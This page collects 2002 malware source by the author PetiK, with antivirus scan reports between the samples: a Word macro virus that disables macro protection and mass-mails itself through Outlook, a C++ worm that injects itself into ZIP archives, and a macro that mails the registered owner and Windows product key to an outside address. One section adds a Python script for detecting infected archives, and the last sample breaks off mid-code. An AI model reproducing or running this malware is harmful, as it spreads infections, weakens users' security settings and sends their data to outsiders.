2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Virus.VBS.Petik!IK HTML/Htz VBS/Petik.1 Virus/VBS.VBS VBS/Chu.C@mm VBS:Malware-gen VBS/Nuel Generic.ScriptWorm.7F8BE6E9 VBS/Chu.C Worm.VBS.Petik Unclassified Malware VBS.Generic.16 VBS.TVKid. VBS/Nuel.B VBS/Chu.C@mm Virus.VBS.Petik VBS/Htz@mm Generic.ScriptWorm.7F8BE6E9 Virus.VBS.Petik Virus.VBS.Petik VBS/Nuel@MM VBS/Nuel@MM Script.Petik.1 Virus:VBS/Petik.gen probably unknown SCRIPT VBS/Petik.P VBS.Petik.J@mm VBS/Petik.L VBS.Acroph.A Script.VBS.Petik VBS/Petik-W VBS.Manu@mm VBS_PETIK.G Virus.VBS.Petik VBS.Worm-Family VBS.Acroph.A

Additional information File size: 3349 bytes MD5...: 8b66aadcff8510521ba7f0bacb6fc54a SHA1..: e1022a03f29f2ffd74764d6e4547b691c16991bc

' Name     : W97M.AutoSpread
' Author   : PetiK
' Language : VBA Word
' Date     : 09/05/2002

Attribute VB_Name = "AutoSpread" Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long) Sub AutoOpen() nam = ActiveDocument.Name vnam = Left(nam, Len(nam) - 4) Call FuckProtection Call InfectWord Call Spread If Day(Now) = 8 Then MsgBox "This Document is infected by W97M." + vnam, vbCritical, "W97M." + vnam + ".A" End If End Sub Sub InfectWord() On Error Resume Next Set nor = NormalTemplate.VBProject.VBComponents Set doc = ActiveDocument.VBProject.VBComponents srcmod = "C:\kitep.drv" If nor.Item("AutoSpread").Name <> "AutoSpread" Then doc("AutoSpread").Export srcmod nor.Import srcmod End If If doc.Item("AutoSpread").Name <> "AutoSpread" Then nor("AutoSpread").Export srcmod doc.Import srcmod ActiveDocument.Save End If Kill (srcmod) End Sub Sub FuckProtection() With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End Select WordBasic.DisableAutoMacros 0 End Sub Sub Spread() On Error Resume Next subj = Left(ActiveDocument.Name, Len(ActiveDocument.Name) - 4) att = ActiveDocument.FullName win = Environ("windir") FileSystem.MkDir win + "\AutoSpread" x = 0 nfile = "" Do While x < 8 Randomize (Timer) nfile = nfile + Chr(Int(Rnd(1) * 8) + 48) x = x + 1 Loop reg = nfile nfile = nfile + ".vbs" nfile = win + "\AutoSpread\" + nfile Open nfile For Output As #1 Print #1, "'From W97M.AutoSpread" Print #1, "On Error Resume Next"

Print #1, "Set out=CreateObject(""Outlook.Application"")" Print #1, "Set map=out.GetNameSpace(""MAPI"")" Print #1, "For Each C in map.AddressLists" Print #1, "If C.AddressEntries.Count <> 0 Then" Print #1, "For D=1 To C.AddressEntries.Count" Print #1, "Set E=C.AddressEntries(D)" Print #1, "Set env=out.CreateItem(0)" Print #1, "env.To=E.Address" Print #1, "env.Subject=""" + subj + """" Print #1, "env.Body=""This confidential document is for you.""" Print #1, "env.Attachments.Add(""" + att + """)" Print #1, "env.DeleteAfterSubmit=True" Print #1, "If env.To <> """" Then" Print #1, "env.Send" Print #1, "End If" Print #1, "Next" Print #1, "End If" Print #1, "Next" Print #1, "WScript.Quit" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", reg) = nfile End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "W97M.AutoSpread.A coded by PetiK (c)2002" .Heading = "W97M.AutoSpread" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With slp = Sleep(5000) For nb = 1 To Int(Rnd(1) * 10) + 1 Selection.TypeText "Hi guy, You're infected by my virus. It's not dangerous. " Selection.TypeText "Refer to AntiVirus site to disinfect your computer. " Selection.TypeText "No dangerous payload, large spread, it's coded by PetiK. " Next nb End Sub 76406570.vbs 'From W97M.AutoSpread On Error Resume Next Set out=CreateObject("Outlook.application") Set map=out.GetNameSpace("MAPI") For Each C in map.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.Count Set E=C.AddressEntries(D) Set env=out.CreateItem(0) env.To=E.Address env.Subject="HelloWorld" env.Body="This confidential document is for you." env.Attachments.Add("C:\PetiK\W32.HLLW.RLF\HelloWorld.doc") env.DeleteAfterSubmit=True If env.To <> "" Then env.Send End If Next End If Next WScript.Quit

Scan report for AutoSpread.doc, received on 05.16.2009 10:45:28 (CET). The per-engine rows of the table did not survive extraction: the four columns are reproduced below in their original order, but fewer results than engines survive, so a detection name cannot be mapped back to a particular engine.

Engines (40): a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Engine versions: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last update: 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15

Results (detection names, 37 reported): Email-Worm.Win32.Petik!IK W97M/Apish.B W2000M/Droopy.A W97M/Beko.B@mm MW97:Beko family W97M/Beko W97M.Petik.A@mm W97M.ZMK.M WM.Pivis Worm.Win32.Email-Worm.Petik W97M.Petik Win32.Petik W97M/Beko.B:mm W97M/Beko.B@mm Email-Worm.Win32.Petik W97M/Petik.B W97M.Petik.A@mm Email-Worm.Win32.Petik Macro.Beko Email-Worm.Win32.Petik W97M/Generic@MM W97M/Generic@MM Macro.Droopy.A Virus:W97M/Aspread.A@mm W97M/Beko.B W97M/Beko.B W97M.Petik.A@mm W97M/CokeBoy WORD.97.Petaspr.A Worm.Mail.Agent.ac WM97/Spread-A W97M.Beko@mm W2KM/Generico W97M_BEKO.B Email-Worm.Win32.Petik W97M.Beko.B WORD.97.Petaspr.A

Additional information
File size: 40960 bytes
MD5: b7f7ed86d457fec2493db21e8886b981
SHA1: 5f1c2e11b84ac3df1e06f9dc290c3706735b8065

/*
   Name     : I-Worm.Archiver
   Author   : PetiK
   Date     : May 10th 2002
   Language : C++
   Comments : Infects ZIP files using WinZip. The same thing can be done with PowerArchiver:
              powerarc -a -c4 archive.zip virus.exe
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>

#pragma argused
#pragma inline

char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
char *fnam[]={"news","support","info","newsletter","webmaster"};
char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
      SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;
BOOL installed;
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
      sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
WIN32_FIND_DATA ffile;

void infzip(char *);

/* Simple MAPI entry points, resolved at run time from MAPI32.DLL */
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
  GetModuleFileName(hInst,filen,100);
  GetSystemDirectory((char *)sysdir,100);
  GetWindowsDirectory((char *)copyn,100);
  strcpy(windir,copyn);
  strcat(copyn,"\\Archiver.exe");         /* installed copy: %windir%\Archiver.exe */
  installed=FALSE;
  cmdLine=GetCommandLine();
  if(cmdLine)
  {
    /* "-i" marks the installed copy, "-p" shows the about box */
    for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
    if(ptr[0]=='-' && ptr[1]!=0)
    {
      switch(ptr[1])
      {
        default:  break;
        case 'i': installed=TRUE; break;
        case 'p': ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
                  MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
                             "I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
                  ExitProcess(0);
                  break;
      }
    }
  }
  if(!installed)
  {
    /* first run: drop the copy and exit; the Run-key registration is commented out in this build */
    CopyFile(filen,copyn,FALSE);
    strcpy(copyreg,copyn);
    strcat(copyreg," -i");
    /*
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
    RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
    RegCloseKey(hReg);
    */
    ExitProcess(0);
  }
  /* shell folders of the default user profile */
  RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  RegCloseKey(hReg);
  /* path of winzip32.exe from App Paths; without WinZip nothing is infected */
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
  RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
  RegCloseKey(hReg);
  if(strlen(winzip)!=0)
  {
    infzip(windir);
    infzip(sysdir);
    infzip(desktop);
    infzip(personal);
    infzip(favoris);
    infzip("C:\\");
  }
  /* Everything from here to ExitProcess is commented out in the source:
     an inline-asm online check followed by a Simple MAPI reply-to-inbox mailer. */
  /*
  _asm
  {
    call @wininet
    db "WININET.DLL",0
  @wininet:
    call LoadLibrary
    test eax,eax
    jz end_asm
    mov ebp,eax
    call @inetconnect
    db "InternetGetConnectedState",0
  @inetconnect:
    push ebp
    call GetProcAddress
    test eax,eax
    jz end_wininet
    mov edi,eax
  verf:
    push 0
    push Tmp
    call edi
    dec eax
    jnz verf
  end_wininet:
    push ebp
    call FreeLibrary
  end_asm:
    jmp end_all_asm
  Tmp dd 0
  end_all_asm:
  }
  hMAPI=LoadLibrary("MAPI32.DLL");
  (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
  (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
  (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
  (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
  (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
  mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
  if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS)
  {
    do
    {
      if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS)
      {
        strcpy(mname,mes->lpOriginator->lpszName);
        strcpy(maddr,mes->lpOriginator->lpszAddress);
        for(i=0;i<8;i++) attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
        fsubj[0]=0;
        wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
        mes->ulReserved=0;
        mes->lpszSubject=fsubj;
        mes->lpszNoteText="This is some news send by our firm about security.\n"
                          "Please read by clicking on attached file.\n"
                          "\tBest Regards";
        mes->lpszMessageType=NULL;
        mes->lpszDateReceived=NULL;
        mes->lpszConversationID=NULL;
        mes->flFlags=MAPI_SENT;
        mes->lpOriginator->ulReserved=0;
        mes->lpOriginator->ulRecipClass=MAPI_ORIG;
        mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
        mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
        mes->nRecipCount=1;
        mes->lpRecips->ulReserved=0;
        mes->lpRecips->ulRecipClass=MAPI_TO;
        mes->lpRecips->lpszName=mname;
        mes->lpRecips->lpszAddress=maddr;
        mes->nFileCount=1;
        mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
        memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
        mes->lpFiles->ulReserved=0;
        mes->lpFiles->flFlags=NULL;
        mes->lpFiles->nPosition=-1;
        mes->lpFiles->lpszPathName=filen;
        mes->lpFiles->lpszFileName=attname;
        mes->lpFiles->lpFileType=NULL;
        mSendMail(session, NULL, mes, NULL, NULL);
      }
    }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
    free(mes->lpFiles);
    mFreeBuffer(mes);
    mLogoff(session,0,0,0);
    FreeLibrary(hMAPI);
  }
  */
  ExitProcess(0);
}

/* Append the installed copy to every *.zip in a folder by driving winzip32.exe */
void infzip(char *folder)
{
  register bool abc=TRUE;
  register HANDLE fh;
  if(strlen(folder)!=0)
  {
    SetCurrentDirectory(folder);
    fh=FindFirstFile("*.zip",&ffile);
    if(fh!=INVALID_HANDLE_VALUE)
    {
      while(abc)
      {
        inzip[0]=0;
        wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
        WinExec(inzip,1);
        abc=FindNextFile(fh,&ffile);
      }
    }
  }
}
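The infection routine above does nothing more exotic than run `winzip32 -a -r <archive> <copy>` against every archive it finds, so the artefact a responder looks for is an executable member that was appended to an otherwise ordinary ZIP. The following triage script is an added example written for this page; it is not part of PetiK's source. It flags a member either by its MZ header (so a renamed drop is still caught) or by the name the worm uses for its copy. It assumes the appended file ends up stored under its bare name, as in the sample archive it builds; the archives and the 64-byte MZ stub are constructed on the spot and are not real malware.

```python
"""Triage ZIP archives for executables appended by a WinZip "-a" style infector."""
import io
import tempfile
import zipfile
from pathlib import Path

# Name of the copy the worm appends (copyn in the source above); assumed to be
# stored without its directory part. Header matching does not depend on this.
KNOWN_DROP_NAMES = {"archiver.exe"}
MZ = b"MZ"


def injected_executables(zip_bytes: bytes) -> list:
    """Return member names that are DOS/PE executables by header or match a known drop name."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)          # only the first two bytes are needed
            name = Path(info.filename).name.lower()
            if head == MZ or name in KNOWN_DROP_NAMES:
                flagged.append(info.filename)
    return flagged


def scan_zip_tree(root: Path) -> dict:
    """Map each suspicious archive (path relative to root) to its flagged members."""
    report = {}
    for p in sorted(root.rglob("*.zip")):
        try:
            hits = injected_executables(p.read_bytes())
        except zipfile.BadZipFile:
            continue                       # not a real archive; outside this check
        if hits:
            report[p.relative_to(root).as_posix()] = hits
    return report


def _build_zip(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a 64-byte MZ stub stands in for the worm body.
FAKE_PE = MZ + b"\x90" * 62
CLEAN_ZIP = _build_zip({"readme.txt": b"nothing to see here\n"})
INFECTED_ZIP = _build_zip({"readme.txt": b"quarterly figures\n", "Archiver.exe": FAKE_PE})
RENAMED_ZIP = _build_zip({"docs/notes.txt": b"x", "docs/update.scr": FAKE_PE})


def demo() -> dict:
    """Write the constructed archives into a temporary tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "My Documents").mkdir()
        (root / "clean.zip").write_bytes(CLEAN_ZIP)
        (root / "My Documents" / "report.zip").write_bytes(INFECTED_ZIP)
        (root / "My Documents" / "old.zip").write_bytes(RENAMED_ZIP)
        return scan_zip_tree(root)


if __name__ == "__main__":
    for archive, members in demo().items():
        print(f"{archive}: {members}")
```

Point `scan_zip_tree` at the same folders the worm walks (Windows, System, Desktop, Personal, Favorites, the root of C:) to enumerate every archive it could have touched; header matching is deliberately extension-agnostic because a member called `update.scr` or `setup.dat` is just as executable once extracted.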

Scan report for Archiver.exe, received on 05.16.2009 10:45:20 (CET). The per-engine rows did not survive extraction; the columns are reproduced in their original order, and the results cannot be mapped back to individual engines.

Engines (40): a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Engine versions: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last update: 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15

Results (detection names): Email-Worm.Win32.Petik!IK Win32/Petik.worm.23048 Worm/Petik-1 Worm/Win32.Win32 W32/Malware!185a Win32:Trojan-gen {Other} I-Worm/Petik Win32.Petik.J@mm I-Worm.Petik Worm.Archer Worm.Win32.Petik.Archer Win32.HLLM.Petik.49152 Win32.Petik.b Win32/Petik.23040 W32/Malware!185a Email-Worm.Win32.Petik W32/Petik!worm Win32.Petik.J@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/Stopin.d@MM W32/Stopin.d@MM Worm.Petik-1 Worm:Win32/Petick Win32/Petik.Archer W32/Petik.AM Worm/W32.Petik.23040 Worm Generic HLLW.Petarch.A High Risk Worm Worm.Archivera W32/Archiver-A Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/Petik WORM_PETIK.C Win32.HLLW.Archiver HLLW.Petarch.A

Additional information
File size: 23040 bytes
MD5: 6079048134255a415e569a57402d7c56
SHA1: 35867a4491825a6c2557e6103cb6164705d6328d
SHA256: f88aec37d60795ac97b73574b674bbf40bd8466dac54a33b1e1a8c0df8035391
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

' Name     : W97M.ApiWord
' Author   : PetiK
' Language : VBA Word
' Date     : 14/05/2002
'
VB_Name = "ApiWord"
Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)
Private Declare Function CopyFile& Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Boolean)
Private Declare Function CreateDirectory& Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpszCrDir As String, ByVal secu As Long)
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long)
Private Declare Function ShowCursor& Lib "user32" (ByVal fshow As Boolean)
Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias "WritePrivateProfileStringA" _
    (ByVal lpszSection As String, ByVal lpszKey As String, _
     ByVal lpszString As String, ByVal lpszFile As String)

Sub AutoOpen()
    slp = Sleep(1000)
    winp = Environ("windir")
    crd = CreateDirectory(winp + "\ApiSystem", 0)
    cp = CopyFile(ActiveDocument.FullName, winp + "\ApiSystem\HelloU.doc", False)
    Call endprotect
    Call infdoc
    Call SrchF
    Call PayLoad
End Sub

Sub HelpAbout()
    MsgBox "System must be shutdown.", vbCritical, "Warning"
    ext = ExitWindowsEx(2, 0)
End Sub

' Collect registration and product-key values from the registry, write them to an
' INI file and mail it out once; the HKLM\...\ApiWord key is the "already sent" marker.
Sub SrchF()
    On Error Resume Next
    winp = Environ("windir")
    infile = winp + "\ApiSystem\AboutU.ini"
    MS = "HKEY_LOCAL_MACHINE\Software\Microsoft\ApiWord"
    If System.PrivateProfileString("", MS, "Send Info") <> "OK" Then
        CV = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
        nom = System.PrivateProfileString("", CV, "RegisteredOwner")
        ent = System.PrivateProfileString("", CV, "RegisteredOrganization")
        ver = System.PrivateProfileString("", CV, "Version")
        vern = System.PrivateProfileString("", CV, "VersionNumber")
        pi = System.PrivateProfileString("", CV, "ProductId")
        pk = System.PrivateProfileString("", CV, "ProductKey")
        pf = System.PrivateProfileString("", CV, "ProgramFilesDir")
        sp = System.PrivateProfileString("", _
            "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page")
        wr = WritePrivateProfileString("Information", "Name", nom, infile)
        wr = WritePrivateProfileString("Information", "Organization", ent, infile)
        wr = WritePrivateProfileString("Information", "Version of Windows", ver, infile)
        wr = WritePrivateProfileString("Information", "Number of Version", vern, infile)
        wr = WritePrivateProfileString("Information", "Identification Number", pi, infile)
        wr = WritePrivateProfileString("Information", "Key Number", pk, infile)
        wr = WritePrivateProfileString("Information", "Program Files Path", pf, infile)
        wr = WritePrivateProfileString("Information", "Start Page", sp, infile)

        Set out = CreateObject("Outlook.Application")
        Set map = out.GetNameSpace("MAPI")
        map.Logon "profile", "password"
        mel = out.CreateItem(0)
        mel.To = "apiinfo@lycos.fr"
        mel.Subject = "Mail from " + nom
        mel.Attachments.Add (infile)
        mel.DeleteafterSubmit = True
        mel.Send
        map.Logoff

        System.PrivateProfileString("", MS, "Author") = "PetiK"
        System.PrivateProfileString("", MS, "Info File") = infile
        System.PrivateProfileString("", MS, "Name") = "W97M.ApiWord"
        System.PrivateProfileString("", MS, "Version") = "A"
        System.PrivateProfileString("", MS, "Send Info") = "OK"
    End If
End Sub

' Copy the module between Normal.dot and the active document through an exported source file
Sub infdoc()
    On Error Resume Next
    winp = Environ("windir")
    Set Nor = NormalTemplate.VBProject.VBComponents
    Set Doc = ActiveDocument.VBProject.VBComponents
    DropFile = winp + "\ApiSystem\src.txt"
    If Nor.Item("ApiWord").Name <> "ApiWord" Then
        Doc("ApiWord").Export DropFile
        Nor.Import DropFile
    End If
    If Doc.Item("ApiWord").Name <> "ApiWord" Then
        Nor("ApiWord").Export DropFile
        Doc.Import DropFile
        ActiveDocument.Save
    End If
End Sub

' Lower Word's macro security and allow VBA project access (Word 2000 / 2002)
Sub endprotect()
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    Select Case Application.Version
        Case "10.0"
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
        Case "9.0"
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    End Select
    WordBasic.DisableAutoMacros 0
End Sub

Sub PayLoad()
    num = Int((Rnd * 10) + 1)
    If num = 1 Then
        sm = SwapMouseButton(&H2)
    ElseIf num = 5 Then
        sc = ShowCursor(False)
        slp = Sleep(10000)
        sc = ShowCursor(True)
    End If
End Sub

Scan report for ApiWord.doc, received on 05.16.2009 10:45:11 (CET). The per-engine rows did not survive extraction; the columns are reproduced in their original order, and the results cannot be mapped back to individual engines.

Engines (40): a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Engine versions: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last update: 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15

Results (detection names): Virus.MSWord.Petik.B!IK W97M/Apish W2000M/Droopy.A Virus/MSWord.Petik W97M/Apish.A MW97:Apish-A W97M/Droopy W97M.Petik.B W97M.Prilissa W97M.Petik.B Virus.MSWord.Petik.b W97M.Petik W97M.ApiWord W97M/Apish.A W97M/Apish.A Virus.MSWord.Petik.b W97M/Petik.B W97M.Petik.B Virus.MSWord.Petik.B Macro.Petik.b Virus.MSWord.Petik.b W97M/Generic@MM W97M/Generic@MM Macro.Droopy.A Virus:W97M/Petik.B W97M/Apish.A W97M/Amish.A W97M.Petik.B W97M/CokeBoy WORD.97.Petapwd.A Macro.Word.ApiWord WM97/Petik-B Virus.MSWord.Petik.b (v) W97M.Apish W2KM/Generico W97M_PETIK.B Virus.MSWord.Petik.b W97M.Apish.A WORD.97.Petapwd.A

Additional information
File size: 37888 bytes
MD5: 0b6d3ba97c607d4c334e45fda1907912
SHA1: 826552b0aa5837a1c4c205d8c980d103deaafc01

' Name     : W32.HLLW.Visual
' Author   : PetiK
' Language : Visual Basic
' Date     : 19/05/2002
'
Attribute VB_Name = "Module1"

Sub Main()
    On Error Resume Next
    Set fso = CreateObject("Scripting.FilesystemObject")
    Set ws = CreateObject("WScript.Shell")
    orig = App.Path & "\" & App.EXEName & ".exe"
    cop = fso.GetSpecialFolder(1) & "\kern32dll.exe"
    FileCopy orig, cop
    ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kern32dll", cop
    fso.CreateFolder ("C:\Backup")
    ncopy = ""
    For I = 1 To 10
        Randomize (Timer)
        ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
    Next I
    FileCopy orig, "C:\Backup\" & ncopy & ".exe"
    Call inf(ws.SpecialFolders("MyDocuments"))
    Set out = CreateObject("Outlook.Application")
